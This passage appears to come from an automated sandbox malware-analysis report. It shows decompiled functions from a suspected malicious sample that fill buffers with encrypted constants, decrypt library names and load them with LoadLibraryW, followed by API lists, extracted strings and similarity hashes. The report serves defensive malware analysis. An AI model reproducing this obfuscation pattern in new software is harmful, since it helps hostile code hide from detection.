				 *((intOrPtr*)(_t463 - 0x44)) = 0xa6fe7617;
				 *((intOrPtr*)(_t463 - 0x40)) = 0xce77743f;
				 *((intOrPtr*)(_t463 - 0x3c)) = 0xed2f08ba;
				 *((intOrPtr*)(_t463 - 0x38)) = 0xb7a020b5;
				 *((intOrPtr*)(_t463 - 0x34)) = 0x5049adfa;
				 *((intOrPtr*)(_t463 - 0x30)) = 0x4653483e;
				 *((intOrPtr*)(_t463 - 0x2c)) = 0xf88fc154;
				 *((intOrPtr*)(_t463 - 0x28)) = 0x2170b424;
				 *((intOrPtr*)(_t463 - 0x24)) = 0x97127f63;
				 *((intOrPtr*)(_t463 - 0x20)) = 0x2c72e78b;
				 *((intOrPtr*)(_t463 - 0x1c)) = 0xa4a4af2b;
				 *((intOrPtr*)(_t463 - 0x18)) = 0xa22f88e1;
				 *((intOrPtr*)(_t463 - 0x14)) = 0x26e727d2;
				 *((intOrPtr*)(_t463 - 0x10)) = 0xba3bd70d;
				 *((intOrPtr*)(_t463 - 0xc)) = 0x532c4572;
				 *((intOrPtr*)(_t463 - 8)) = 0x72bb8f8c;
				 *((intOrPtr*)(_t463 - 4)) = 0x92993252;
				_t461 = L00111D00(0x122650, 0x110, _t459);
				 *0x127c78 = LoadLibraryW(_t461);
				_t452 = HeapFree(GetProcessHeap(), 0, _t461);
				_t456 =  *0x127c78; // 0x764b0000
				_t462 = 0x1f5c6a;
				if(_t456 != 0) {
					goto 0x3016c5;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t454, _t456, _t463 - 0x6fc, _t459, _t462);
				} else {
					goto 0x3016b2;
					return _t452;
				}
			}

APIs

LoadLibraryW.KERNEL32(00000000), ref: 001182AA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001182B8
HeapFree.KERNEL32(00000000), ref: 001182BF

Strings

P+"V, xrefs: 0011747C
rE,S, xrefs: 0011828A
An\;, xrefs: 00117E54
V@%, xrefs: 001179EA
S#w7, xrefs: 00117210
fsI, xrefs: 00117620
xZ}, xrefs: 001180C0
Xe:, xrefs: 00117A44
, ?|, xrefs: 00117594
,W<B, xrefs: 001179FE
*U I, xrefs: 00117B20
ZGK~, xrefs: 0011794A
Mr-J, xrefs: 00117184
]vFu, xrefs: 001175E4
Vy6, xrefs: 00117E68
;> , xrefs: 00118165
7r)P, xrefs: 00118066
_5S, xrefs: 00117378
>HSF, xrefs: 0011824B

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: Xe:$*U I$, ?|$,W<B$7r)P$>HSF$An\;$Mr-J$P+"V$S#w7$Vy6$ZGK~$]vFu$_5S$fsI$rE,S$xZ}$;> $V@%
API String ID: 872250060-430349358
Opcode ID: c6a97b20fec0d2f5c4ebe76796302a71b20490074cc0896ee2735c03d15f4527
Instruction ID: eba9e5b9c87c315d0c9971405bb709c1d2f4e266314e3bfabb5d0e0c00ca23c6
Opcode Fuzzy Hash: c6a97b20fec0d2f5c4ebe76796302a71b20490074cc0896ee2735c03d15f4527
Instruction Fuzzy Hash: 5B8294F48467698FDB618F429E8468EBA75FB52305F6086C8C25D3B214CB750BD2CF89

Uniqueness

Uniqueness Score: 100.00%

Function 001195BA, Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 362
memorylibraryUNIQUE

C-Code - Quality: 96%

			E001195BA(void* __esi, void* __eflags) {
				int _t347;
				void* _t349;
				intOrPtr _t351;
				void* _t354;
				void* _t356;
				void* _t357;
				void* _t358;

				 *((intOrPtr*)(_t358 - 0x558)) = 0x5983dc83;
				 *((intOrPtr*)(_t358 - 0x554)) = 0x6205147;
				 *((intOrPtr*)(_t358 - 0x550)) = 0x9c52694a;
				 *((intOrPtr*)(_t358 - 0x54c)) = 0xea11a8ca;
				 *((intOrPtr*)(_t358 - 0x548)) = 0xf4e832d5;
				 *((intOrPtr*)(_t358 - 0x544)) = 0xb42439a8;
				 *((intOrPtr*)(_t358 - 0x540)) = 0x86c85539;
				 *((intOrPtr*)(_t358 - 0x53c)) = 0xff8e5c81;
				 *((intOrPtr*)(_t358 - 0x538)) = 0x3fb35c90;
				 *((intOrPtr*)(_t358 - 0x534)) = 0x57b16f81;
				 *((intOrPtr*)(_t358 - 0x530)) = 0x37ce5ecd;
				 *((intOrPtr*)(_t358 - 0x52c)) = 0xc6349551;
				 *((intOrPtr*)(_t358 - 0x528)) = 0xe3cb20bc;
				 *((intOrPtr*)(_t358 - 0x524)) = 0xf50b0380;
				 *((intOrPtr*)(_t358 - 0x520)) = 0xec73c88e;
				 *((intOrPtr*)(_t358 - 0x51c)) = 0x234399d1;
				 *((intOrPtr*)(_t358 - 0x518)) = 0x17cbc3b;
				 *((intOrPtr*)(_t358 - 0x514)) = 0x810ab82a;
				 *((intOrPtr*)(_t358 - 0x510)) = 0x5c585a3e;
				 *((intOrPtr*)(_t358 - 0x50c)) = 0x95eb5a86;
				 *((intOrPtr*)(_t358 - 0x508)) = 0xbcf8e1f;
				 *((intOrPtr*)(_t358 - 0x504)) = 0x40edeb7e;
				 *((intOrPtr*)(_t358 - 0x500)) = 0xea6e92a7;
				 *((intOrPtr*)(_t358 - 0x4fc)) = 0xd576636c;
				 *((intOrPtr*)(_t358 - 0x4f8)) = 0x41cee1bc;
				 *((intOrPtr*)(_t358 - 0x4f4)) = 0x37250fc;
				 *((intOrPtr*)(_t358 - 0x4f0)) = 0x4e30bf56;
				 *((intOrPtr*)(_t358 - 0x4ec)) = 0x3decacab;
				 *((intOrPtr*)(_t358 - 0x4e8)) = 0xefe66d4c;
				 *((intOrPtr*)(_t358 - 0x4e4)) = 0x94023881;
				 *((intOrPtr*)(_t358 - 0x4e0)) = 0xc560eac;
				 *((intOrPtr*)(_t358 - 0x4dc)) = 0xc528d1f9;
				 *((intOrPtr*)(_t358 - 0x4d8)) = 0x1f6e1575;
				 *((intOrPtr*)(_t358 - 0x4d4)) = 0xaec179f;
				 *((intOrPtr*)(_t358 - 0x4d0)) = 0x30985a0c;
				 *((intOrPtr*)(_t358 - 0x4cc)) = 0x48e5158f;
				 *((intOrPtr*)(_t358 - 0x4c8)) = 0xf5ad63f4;
				 *((intOrPtr*)(_t358 - 0x4c4)) = 0x1ad9829c;
				 *((intOrPtr*)(_t358 - 0x4c0)) = 0x97309805;
				 *((intOrPtr*)(_t358 - 0x4bc)) = 0xd12beb8;
				 *((intOrPtr*)(_t358 - 0x4b8)) = 0xc0b96d24;
				 *((intOrPtr*)(_t358 - 0x4b4)) = 0x1d320e17;
				 *((intOrPtr*)(_t358 - 0x4b0)) = 0x41be0792;
				 *((intOrPtr*)(_t358 - 0x4ac)) = 0x7047ade7;
				 *((intOrPtr*)(_t358 - 0x4a8)) = 0x1759681;
				 *((intOrPtr*)(_t358 - 0x4a4)) = 0xef64f19b;
				 *((intOrPtr*)(_t358 - 0x4a0)) = 0xf69756ef;
				 *((intOrPtr*)(_t358 - 0x49c)) = 0x848cfa8b;
				 *((intOrPtr*)(_t358 - 0x498)) = 0xe24a2799;
				 *((intOrPtr*)(_t358 - 0x494)) = 0x21bab94d;
				 *((intOrPtr*)(_t358 - 0x490)) = 0xf9cffe40;
				 *((intOrPtr*)(_t358 - 0x48c)) = 0x121baed7;
				 *((intOrPtr*)(_t358 - 0x488)) = 0xecdca60c;
				 *((intOrPtr*)(_t358 - 0x484)) = 0x9ade6e2c;
				 *((intOrPtr*)(_t358 - 0x480)) = 0x8d0df929;
				 *((intOrPtr*)(_t358 - 0x47c)) = 0xa3a42f5d;
				 *((intOrPtr*)(_t358 - 0x478)) = 0x2b6599;
				 *((intOrPtr*)(_t358 - 0x474)) = 0x8570bfb;
				 *((intOrPtr*)(_t358 - 0x470)) = 0xb1287738;
				 *((intOrPtr*)(_t358 - 0x46c)) = 0xaab6ccff;
				 *((intOrPtr*)(_t358 - 0x468)) = 0x1e5133f6;
				 *((intOrPtr*)(_t358 - 0x464)) = 0xad65e96a;
				 *((intOrPtr*)(_t358 - 0x460)) = 0xb82055dd;
				 *((intOrPtr*)(_t358 - 0x45c)) = 0x3f8794c5;
				 *((intOrPtr*)(_t358 - 0x458)) = 0x4257c01a;
				 *((intOrPtr*)(_t358 - 0x454)) = 0xd574423b;
				 *((intOrPtr*)(_t358 - 0x450)) = 0xd390a41e;
				 *((intOrPtr*)(_t358 - 0x44c)) = 0xb5b6efd7;
				 *((intOrPtr*)(_t358 - 0x448)) = 0x55f35975;
				 *((intOrPtr*)(_t358 - 0x444)) = 0x5d07ad64;
				 *((intOrPtr*)(_t358 - 0x440)) = 0x69ef2174;
				 *((intOrPtr*)(_t358 - 0x43c)) = 0xca43e0cc;
				 *((intOrPtr*)(_t358 - 0x438)) = 0x9d2d59d9;
				 *((intOrPtr*)(_t358 - 0x434)) = 0x76e645a5;
				 *((intOrPtr*)(_t358 - 0x430)) = 0xc6f3628e;
				 *((intOrPtr*)(_t358 - 0x42c)) = 0x568dc342;
				 *((intOrPtr*)(_t358 - 0x428)) = 0x28f8c939;
				 *((intOrPtr*)(_t358 - 0x424)) = 0x52b6dd6c;
				 *((intOrPtr*)(_t358 - 0x420)) = 0x9ce342d0;
				 *((intOrPtr*)(_t358 - 0x41c)) = 0x78061332;
				 *((intOrPtr*)(_t358 - 0x418)) = 0x72dffa0c;
				 *((intOrPtr*)(_t358 - 0x414)) = 0x4c7a188b;
				 *((intOrPtr*)(_t358 - 0x410)) = 0x1056a024;
				 *((intOrPtr*)(_t358 - 0x40c)) = 0x1fd121d0;
				 *((intOrPtr*)(_t358 - 0x408)) = 0x7a29a4a6;
				 *((intOrPtr*)(_t358 - 0x404)) = 0x5616e816;
				 *((intOrPtr*)(_t358 - 0x400)) = 0xc8a7c690;
				 *((intOrPtr*)(_t358 - 0x3fc)) = 0x634496e9;
				 *((intOrPtr*)(_t358 - 0x3f8)) = 0x1aeda1c1;
				 *((intOrPtr*)(_t358 - 0x3f4)) = 0xc77be79e;
				 *((intOrPtr*)(_t358 - 0x3f0)) = 0xc10d7c15;
				 *((intOrPtr*)(_t358 - 0x3ec)) = 0x678d53e;
				 *((intOrPtr*)(_t358 - 0x3e8)) = 0xe84f9b4d;
				 *((intOrPtr*)(_t358 - 0x3e4)) = 0x2d8e37df;
				 *((intOrPtr*)(_t358 - 0x3e0)) = 0x1c9f512c;
				 *((intOrPtr*)(_t358 - 0x3dc)) = 0x721fe9e4;
				 *((intOrPtr*)(_t358 - 0x3d8)) = 0x2f9e4915;
				 *((intOrPtr*)(_t358 - 0x3d4)) = 0xcb82fd6;
				 *((intOrPtr*)(_t358 - 0x3d0)) = 0x8733750f;
				 *((intOrPtr*)(_t358 - 0x3cc)) = 0x5a96da0b;
				 *((intOrPtr*)(_t358 - 0x3c8)) = 0xfb61b19;
				 *((intOrPtr*)(_t358 - 0x3c4)) = 0xf82ecf56;
				 *((intOrPtr*)(_t358 - 0x3c0)) = 0x5047e2c1;
				 *((intOrPtr*)(_t358 - 0x3bc)) = 0x83c7f9b1;
				 *((intOrPtr*)(_t358 - 0x3b8)) = 0xeb38ecc1;
				 *((intOrPtr*)(_t358 - 0x3b4)) = 0xb540920d;
				 *((intOrPtr*)(_t358 - 0x3b0)) = 0x8a59e6a5;
				 *((intOrPtr*)(_t358 - 0x3ac)) = 0x48ce5054;
				 *((intOrPtr*)(_t358 - 0x3a8)) = 0xb077f7c5;
				 *((intOrPtr*)(_t358 - 0x3a4)) = 0x44b285c2;
				 *((intOrPtr*)(_t358 - 0x3a0)) = 0xb82b7cd6;
				 *((intOrPtr*)(_t358 - 0x39c)) = 0xbac7d26e;
				 *((intOrPtr*)(_t358 - 0x398)) = 0x4fa12047;
				 *((intOrPtr*)(_t358 - 0x394)) = 0x5b1b2387;
				 *((intOrPtr*)(_t358 - 0x390)) = 0x33d23848;
				 *((intOrPtr*)(_t358 - 0x38c)) = 0xc6de4f8;
				 *((intOrPtr*)(_t358 - 0x388)) = 0x803a506;
				 *((intOrPtr*)(_t358 - 0x384)) = 0xa7b6287c;
				 *((intOrPtr*)(_t358 - 0x380)) = 0xd070df9f;
				 *((intOrPtr*)(_t358 - 0x37c)) = 0xcbc4aeb8;
				 *((intOrPtr*)(_t358 - 0x378)) = 0xe185d25e;
				 *((intOrPtr*)(_t358 - 0x374)) = 0xa908665f;
				 *((intOrPtr*)(_t358 - 0x370)) = 0x879d8154;
				 *((intOrPtr*)(_t358 - 0x36c)) = 0xf860ba1c;
				 *((intOrPtr*)(_t358 - 0x368)) = 0x800d30f6;
				 *((intOrPtr*)(_t358 - 0x364)) = 0xefe65c19;
				 *((intOrPtr*)(_t358 - 0x360)) = 0xd2639963;
				 *((intOrPtr*)(_t358 - 0x35c)) = 0x120dd8b4;
				 *((intOrPtr*)(_t358 - 0x358)) = 0xed0eef0f;
				 *((intOrPtr*)(_t358 - 0x354)) = 0x6fe63af;
				 *((intOrPtr*)(_t358 - 0x350)) = 0x9e1c0c05;
				 *((intOrPtr*)(_t358 - 0x34c)) = 0x9714819b;
				 *((intOrPtr*)(_t358 - 0x348)) = 0x2cec068d;
				 *((intOrPtr*)(_t358 - 0x344)) = 0xbbb137b5;
				 *((intOrPtr*)(_t358 - 0x340)) = 0xe4cbb375;
				 *((intOrPtr*)(_t358 - 0x33c)) = 0xbfb34f78;
				 *((intOrPtr*)(_t358 - 0x338)) = 0x4e068179;
				 *((intOrPtr*)(_t358 - 0x334)) = 0xc0113683;
				 *((intOrPtr*)(_t358 - 0x330)) = 0xf9737f0c;
				 *((intOrPtr*)(_t358 - 0x32c)) = 0x55479d02;
				 *((intOrPtr*)(_t358 - 0x328)) = 0xb0d9adf6;
				 *((intOrPtr*)(_t358 - 0x324)) = 0xb7c3d6cc;
				 *((intOrPtr*)(_t358 - 0x320)) = 0xc0651536;
				 *((intOrPtr*)(_t358 - 0x31c)) = 0xeb7440d0;
				 *((intOrPtr*)(_t358 - 0x318)) = 0x7ad80d80;
				 *((intOrPtr*)(_t358 - 0x314)) = 0xe57fce41;
				 *((intOrPtr*)(_t358 - 0x310)) = 0x17c661bc;
				 *((intOrPtr*)(_t358 - 0x30c)) = 0x34af2289;
				 *((intOrPtr*)(_t358 - 0x308)) = 0xdbc1a9f2;
				 *((intOrPtr*)(_t358 - 0x304)) = 0x32f7bfc1;
				 *((intOrPtr*)(_t358 - 0x300)) = 0x7c4e2bde;
				 *((intOrPtr*)(_t358 - 0x2fc)) = 0xacbd8e;
				 *((intOrPtr*)(_t358 - 0x2f8)) = 0xcb1d61b3;
				 *((intOrPtr*)(_t358 - 0x2f4)) = 0x20f0d8a0;
				 *((intOrPtr*)(_t358 - 0x2f0)) = 0x94ab3a5c;
				 *((intOrPtr*)(_t358 - 0x2ec)) = 0x761af5c4;
				 *((intOrPtr*)(_t358 - 0x2e8)) = 0x14ed8e98;
				 *((intOrPtr*)(_t358 - 0x2e4)) = 0xa831ad9c;
				 *((intOrPtr*)(_t358 - 0x2e0)) = 0xc524836e;
				 *((intOrPtr*)(_t358 - 0x2dc)) = 0xe6692724;
				 *((intOrPtr*)(_t358 - 0x2d8)) = 0x9844baa5;
				 *((intOrPtr*)(_t358 - 0x2d4)) = 0x973f621d;
				 *((intOrPtr*)(_t358 - 0x2d0)) = 0xa5eb5a04;
				 *((intOrPtr*)(_t358 - 0x2cc)) = 0xfa44655;
				 *((intOrPtr*)(_t358 - 0x2c8)) = 0xe8dfd2d9;
				 *((intOrPtr*)(_t358 - 0x2c4)) = 0xa62e4c35;
				 *((intOrPtr*)(_t358 - 0x2c0)) = 0xab1679b5;
				 *((intOrPtr*)(_t358 - 0x2bc)) = 0x386d3d14;
				 *((intOrPtr*)(_t358 - 0x2b8)) = 0x75779727;
				 *((intOrPtr*)(_t358 - 0x2b4)) = 0x37c7d964;
				 *((intOrPtr*)(_t358 - 0x2b0)) = 0xe728cfdd;
				 *((intOrPtr*)(_t358 - 0x2ac)) = 0x3f8d315a;
				 *((intOrPtr*)(_t358 - 0x2a8)) = 0xdbd039e4;
				 *((intOrPtr*)(_t358 - 0x2a4)) = 0xc25468b7;
				 *((intOrPtr*)(_t358 - 0x2a0)) = 0x7b1683d0;
				 *((intOrPtr*)(_t358 - 0x29c)) = 0xec462ef9;
				 *((intOrPtr*)(_t358 - 0x298)) = 0x879af722;
				 *((intOrPtr*)(_t358 - 0x294)) = 0xcf8ef675;
				 *((intOrPtr*)(_t358 - 0x290)) = 0xa2ee51c4;
				 *((intOrPtr*)(_t358 - 0x28c)) = 0xc5acb6f9;
				 *((intOrPtr*)(_t358 - 0x288)) = 0x7b5acd7f;
				 *((intOrPtr*)(_t358 - 0x284)) = 0xbb184437;
				 *((intOrPtr*)(_t358 - 0x280)) = 0x433db52b;
				 *((intOrPtr*)(_t358 - 0x27c)) = 0x483309bf;
				 *((intOrPtr*)(_t358 - 0x278)) = 0xcb574e95;
				 *((intOrPtr*)(_t358 - 0x274)) = 0x4d06b783;
				 *((intOrPtr*)(_t358 - 0x270)) = 0x169002a;
				 *((intOrPtr*)(_t358 - 0x26c)) = 0xf3972182;
				 *((intOrPtr*)(_t358 - 0x268)) = 0xd51e63d2;
				 *((intOrPtr*)(_t358 - 0x264)) = 0x152b5e59;
				 *((intOrPtr*)(_t358 - 0x260)) = 0x94263b0b;
				 *((intOrPtr*)(_t358 - 0x25c)) = 0xa7a0750d;
				 *((intOrPtr*)(_t358 - 0x258)) = 0x109d02c1;
				 *((intOrPtr*)(_t358 - 0x254)) = 0xb65bb0ca;
				 *((intOrPtr*)(_t358 - 0x250)) = 0x13be1387;
				 *((intOrPtr*)(_t358 - 0x24c)) = 0x56836ab5;
				 *((intOrPtr*)(_t358 - 0x248)) = 0x91f818c7;
				 *((intOrPtr*)(_t358 - 0x244)) = 0xe0b133d0;
				 *((intOrPtr*)(_t358 - 0x240)) = 0xebfc50a5;
				 *((intOrPtr*)(_t358 - 0x23c)) = 0xbb467c45;
				 *((intOrPtr*)(_t358 - 0x238)) = 0xc6903029;
				 *((intOrPtr*)(_t358 - 0x234)) = 0x56b9822f;
				 *((intOrPtr*)(_t358 - 0x230)) = 0x161f5c7b;
				 *((intOrPtr*)(_t358 - 0x22c)) = 0xf8c36310;
				 *((intOrPtr*)(_t358 - 0x228)) = 0xaf133463;
				 *((intOrPtr*)(_t358 - 0x224)) = 0x3d71ace0;
				 *((intOrPtr*)(_t358 - 0x220)) = 0x8b2373a4;
				 *((intOrPtr*)(_t358 - 0x21c)) = 0x3d117ec7;
				 *((intOrPtr*)(_t358 - 0x218)) = 0xa10f0c51;
				 *((intOrPtr*)(_t358 - 0x214)) = 0xf7b5c0cb;
				 *((intOrPtr*)(_t358 - 0x210)) = 0x9ad6e526;
				 *((intOrPtr*)(_t358 - 0x20c)) = 0xd88a71b2;
				 *((intOrPtr*)(_t358 - 0x208)) = 0xb03c6a99;
				 *((intOrPtr*)(_t358 - 0x204)) = 0x3dd23aef;
				 *((intOrPtr*)(_t358 - 0x200)) = 0x7bdcc9c1;
				 *((intOrPtr*)(_t358 - 0x1fc)) = 0xa57ff695;
				 *((intOrPtr*)(_t358 - 0x1f8)) = 0xe7039d77;
				 *((intOrPtr*)(_t358 - 0x1f4)) = 0x4dd87db5;
				 *((intOrPtr*)(_t358 - 0x1f0)) = 0x4c8c6b1;
				 *((intOrPtr*)(_t358 - 0x1ec)) = 0x59848d28;
				 *((intOrPtr*)(_t358 - 0x1e8)) = 0x63bce591;
				 *((intOrPtr*)(_t358 - 0x1e4)) = 0xa1335035;
				 *((intOrPtr*)(_t358 - 0x1e0)) = 0x429953cc;
				 *((intOrPtr*)(_t358 - 0x1dc)) = 0xc6040318;
				 *((intOrPtr*)(_t358 - 0x1d8)) = 0x2a09ac84;
				 *((intOrPtr*)(_t358 - 0x1d4)) = 0x4a741c06;
				 *((intOrPtr*)(_t358 - 0x1d0)) = 0x22f98e54;
				 *((intOrPtr*)(_t358 - 0x1cc)) = 0x22bec867;
				 *((intOrPtr*)(_t358 - 0x1c8)) = 0x6ceceaa6;
				 *((intOrPtr*)(_t358 - 0x1c4)) = 0x6d72a35;
				 *((intOrPtr*)(_t358 - 0x1c0)) = 0x7ca5fedf;
				 *((intOrPtr*)(_t358 - 0x1bc)) = 0x389da14e;
				 *((intOrPtr*)(_t358 - 0x1b8)) = 0x6ca50b8;
				 *((intOrPtr*)(_t358 - 0x1b4)) = 0x79e2fc7c;
				 *((intOrPtr*)(_t358 - 0x1b0)) = 0xb3b6bb19;
				 *((intOrPtr*)(_t358 - 0x1ac)) = 0x35241f06;
				 *((intOrPtr*)(_t358 - 0x1a8)) = 0x53258334;
				 *((intOrPtr*)(_t358 - 0x1a4)) = 0xe6525ced;
				 *((intOrPtr*)(_t358 - 0x1a0)) = 0x83c8d4c1;
				 *((intOrPtr*)(_t358 - 0x19c)) = 0xc9795e20;
				 *((intOrPtr*)(_t358 - 0x198)) = 0x71af8df4;
				 *((intOrPtr*)(_t358 - 0x194)) = 0xb4d15598;
				 *((intOrPtr*)(_t358 - 0x190)) = 0xfddf72c8;
				 *((intOrPtr*)(_t358 - 0x18c)) = 0xa21476ad;
				 *((intOrPtr*)(_t358 - 0x188)) = 0xe2b1c96a;
				 *((intOrPtr*)(_t358 - 0x184)) = 0xd148fe0d;
				 *((intOrPtr*)(_t358 - 0x180)) = 0x90a77abc;
				 *((intOrPtr*)(_t358 - 0x17c)) = 0xa8a1eb66;
				 *((intOrPtr*)(_t358 - 0x178)) = 0xe48df59c;
				 *((intOrPtr*)(_t358 - 0x174)) = 0xba7ef889;
				 *((intOrPtr*)(_t358 - 0x170)) = 0x48008e45;
				 *((intOrPtr*)(_t358 - 0x16c)) = 0x86a7f32c;
				 *((intOrPtr*)(_t358 - 0x168)) = 0x7cf8177d;
				 *((intOrPtr*)(_t358 - 0x164)) = 0xdcb09da6;
				 *((intOrPtr*)(_t358 - 0x160)) = 0xac7a15a3;
				 *((intOrPtr*)(_t358 - 0x15c)) = 0x46eb60b1;
				 *((intOrPtr*)(_t358 - 0x158)) = 0x44849955;
				 *((intOrPtr*)(_t358 - 0x154)) = 0x5d7bef1f;
				 *((intOrPtr*)(_t358 - 0x150)) = 0xb923a156;
				 *((intOrPtr*)(_t358 - 0x14c)) = 0xe44cbf6;
				 *((intOrPtr*)(_t358 - 0x148)) = 0xe6d10bbe;
				 *((intOrPtr*)(_t358 - 0x144)) = 0x4478a4e2;
				 *((intOrPtr*)(_t358 - 0x140)) = 0x90258dfc;
				 *((intOrPtr*)(_t358 - 0x13c)) = 0xc6aa7125;
				 *((intOrPtr*)(_t358 - 0x138)) = 0xf1006c86;
				 *((intOrPtr*)(_t358 - 0x134)) = 0xc1265961;
				 *((intOrPtr*)(_t358 - 0x130)) = 0xb236821;
				 *((intOrPtr*)(_t358 - 0x12c)) = 0x76dd8fc4;
				 *((intOrPtr*)(_t358 - 0x128)) = 0x752d6678;
				 *((intOrPtr*)(_t358 - 0x124)) = 0x639409ff;
				 *((intOrPtr*)(_t358 - 0x120)) = 0x1a62b510;
				 *((intOrPtr*)(_t358 - 0x11c)) = 0xfd3c9ac;
				 *((intOrPtr*)(_t358 - 0x118)) = 0xc16cd666;
				 *((intOrPtr*)(_t358 - 0x114)) = 0xe4950ce1;
				 *((intOrPtr*)(_t358 - 0x110)) = 0x7eb3993c;
				 *((intOrPtr*)(_t358 - 0x10c)) = 0xc7aff449;
				 *((intOrPtr*)(_t358 - 0x108)) = 0xb0812683;
				 *((intOrPtr*)(_t358 - 0x104)) = 0xb2ae48b7;
				 *((intOrPtr*)(_t358 - 0x100)) = 0x9676f439;
				 *((intOrPtr*)(_t358 - 0xfc)) = 0x2088b487;
				 *((intOrPtr*)(_t358 - 0xf8)) = 0xa3362ca0;
				 *((intOrPtr*)(_t358 - 0xf4)) = 0x74473bfd;
				 *((intOrPtr*)(_t358 - 0xf0)) = 0xfe8e0440;
				 *((intOrPtr*)(_t358 - 0xec)) = 0x40aec748;
				 *((intOrPtr*)(_t358 - 0xe8)) = 0x7fbf9a1f;
				 *((intOrPtr*)(_t358 - 0xe4)) = 0xfeda4ee7;
				 *((intOrPtr*)(_t358 - 0xe0)) = 0xeb7468a8;
				 *((intOrPtr*)(_t358 - 0xdc)) = 0x3a425629;
				 *((intOrPtr*)(_t358 - 0xd8)) = 0x3399c1e9;
				 *((intOrPtr*)(_t358 - 0xd4)) = 0x889a9a73;
				 *((intOrPtr*)(_t358 - 0xd0)) = 0xed30a909;
				 *((intOrPtr*)(_t358 - 0xcc)) = 0x59329f4c;
				 *((intOrPtr*)(_t358 - 0xc8)) = 0x9d0ba5c4;
				 *((intOrPtr*)(_t358 - 0xc4)) = 0x41ed77f6;
				 *((intOrPtr*)(_t358 - 0xc0)) = 0xc9445cc5;
				 *((intOrPtr*)(_t358 - 0xbc)) = 0x1f58c3e0;
				 *((intOrPtr*)(_t358 - 0xb8)) = 0x385797c3;
				 *((intOrPtr*)(_t358 - 0xb4)) = 0xb97a9bfc;
				 *((intOrPtr*)(_t358 - 0xb0)) = 0x9052c468;
				 *((intOrPtr*)(_t358 - 0xac)) = 0x3600198f;
				 *((intOrPtr*)(_t358 - 0xa8)) = 0xb14a32af;
				 *((intOrPtr*)(_t358 - 0xa4)) = 0x2f5f0dc8;
				 *((intOrPtr*)(_t358 - 0xa0)) = 0x1345611a;
				 *((intOrPtr*)(_t358 - 0x9c)) = 0xb91165af;
				 *((intOrPtr*)(_t358 - 0x98)) = 0x5ce54b83;
				 *((intOrPtr*)(_t358 - 0x94)) = 0x44720685;
				 *((intOrPtr*)(_t358 - 0x90)) = 0xf800f42f;
				 *((intOrPtr*)(_t358 - 0x8c)) = 0x89d9453f;
				 *((intOrPtr*)(_t358 - 0x88)) = 0x8506faaf;
				 *((intOrPtr*)(_t358 - 0x84)) = 0x32cd49b1;
				 *((intOrPtr*)(_t358 - 0x80)) = 0xded9ebd1;
				 *((intOrPtr*)(_t358 - 0x7c)) = 0xfd4b38f1;
				 *((intOrPtr*)(_t358 - 0x78)) = 0xec39f8a6;
				 *((intOrPtr*)(_t358 - 0x74)) = 0x67a4bcf3;
				 *((intOrPtr*)(_t358 - 0x70)) = 0x5a2ebad4;
				 *((intOrPtr*)(_t358 - 0x6c)) = 0x88d4162d;
				 *((intOrPtr*)(_t358 - 0x68)) = 0xa3cda3d3;
				 *((intOrPtr*)(_t358 - 0x64)) = 0x4c991f8f;
				 *((intOrPtr*)(_t358 - 0x60)) = 0x6e605f74;
				 *((intOrPtr*)(_t358 - 0x5c)) = 0x2eacd5ab;
				 *((intOrPtr*)(_t358 - 0x58)) = 0x10ca2833;
				 *((intOrPtr*)(_t358 - 0x54)) = 0xe5e50116;
				 *((intOrPtr*)(_t358 - 0x50)) = 0x7be3ca70;
				 *((intOrPtr*)(_t358 - 0x4c)) = 0x6b20cfbc;
				 *((intOrPtr*)(_t358 - 0x48)) = 0xd0f26335;
				 *((intOrPtr*)(_t358 - 0x44)) = 0x888a83c9;
				 *((intOrPtr*)(_t358 - 0x40)) = 0xafaced26;
				 *((intOrPtr*)(_t358 - 0x3c)) = 0x6c8a5637;
				 *((intOrPtr*)(_t358 - 0x38)) = 0xa231121f;
				 *((intOrPtr*)(_t358 - 0x34)) = 0xf3e163f5;
				 *((intOrPtr*)(_t358 - 0x30)) = 0x5825aa69;
				 *((intOrPtr*)(_t358 - 0x2c)) = 0x4a389261;
				 *((intOrPtr*)(_t358 - 0x28)) = 0xac196404;
				 *((intOrPtr*)(_t358 - 0x24)) = 0x3023c94e;
				 *((intOrPtr*)(_t358 - 0x20)) = 0x9a8265b0;
				 *((intOrPtr*)(_t358 - 0x1c)) = 0xfe2365ee;
				 *((intOrPtr*)(_t358 - 0x18)) = 0x511219c2;
				 *((intOrPtr*)(_t358 - 0x14)) = 0x7af3dec8;
				 *((intOrPtr*)(_t358 - 0x10)) = 0x3c4e52a;
				 *((intOrPtr*)(_t358 - 0xc)) = 0xc5d0799;
				 *((intOrPtr*)(_t358 - 8)) = 0x324220e1;
				 *((intOrPtr*)(_t358 - 4)) = 0xdcd4acd1;
				_t356 = L00111D00(0x122820, 0xd0, _t354);
				 *0x127c88 = LoadLibraryW(_t356);
				_t347 = HeapFree(GetProcessHeap(), 0, _t356);
				_t351 =  *0x127c88; // 0x75cb0000
				_t357 = 0x1f5c6a;
				if(_t351 != 0) {
					goto 0x3017ec;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t349, _t351, _t358 - 0x558, _t354, _t357);
				} else {
					goto 0x3017d9;
					return _t347;
				}
			}

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0011A2D0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011A2DE
HeapFree.KERNEL32(00000000), ref: 0011A2E5

Strings

Lm, xrefs: 001196D2
B2, xrefs: 0011A2B7
xf-u, xrefs: 0011A032
t_`n, xrefs: 0011A20E
>ZX\, xrefs: 0011966E
)VB:, xrefs: 0011A0F0
t!i, xrefs: 00119876
\R, xrefs: 00119EFC
$'i, xrefs: 00119BF0
~@, xrefs: 0011968C
*, xrefs: 00119CFE

Memory Dump Source

